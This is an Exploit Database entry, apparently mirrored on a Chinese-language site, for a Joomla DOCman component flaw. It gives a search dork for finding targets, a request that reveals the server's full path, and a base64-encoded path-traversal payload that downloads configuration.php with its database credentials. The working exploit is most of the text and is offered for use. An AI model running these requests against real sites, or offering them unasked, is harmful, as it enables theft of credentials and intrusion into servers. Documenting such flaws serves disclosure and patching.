Joomla! Component com_docman – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： Hugo Santiago
  日期： 2015-07-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37620/

• # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
  # CWE: CWE-200(FPD) CWE-98(LFI/LFD)
  # Risk: High
  # Author: Hugo Santiago dos Santos
  # Contact: hugo.s@linuxmail.org
  # Date: 13/07/2015
  # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
  # Google Dork: inurl:"/components/com_docman/dl2.php"
  
  # Xploit (FPD): 
   
   Get one target and just download with blank parameter: 
   http://www.site.com/components/com_docman/dl2.php?archive=0&file=
   
   In title will occur Full Path Disclosure of server.
   
  # Xploit (LFD/LFI):
  
   http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
   
   Let's Xploit...
   
   First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
   
   ../../../../../../../target/www/configuration.php <= Not Ready
   
   http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==<= Ready !
   
  
  And Now we have a configuration file...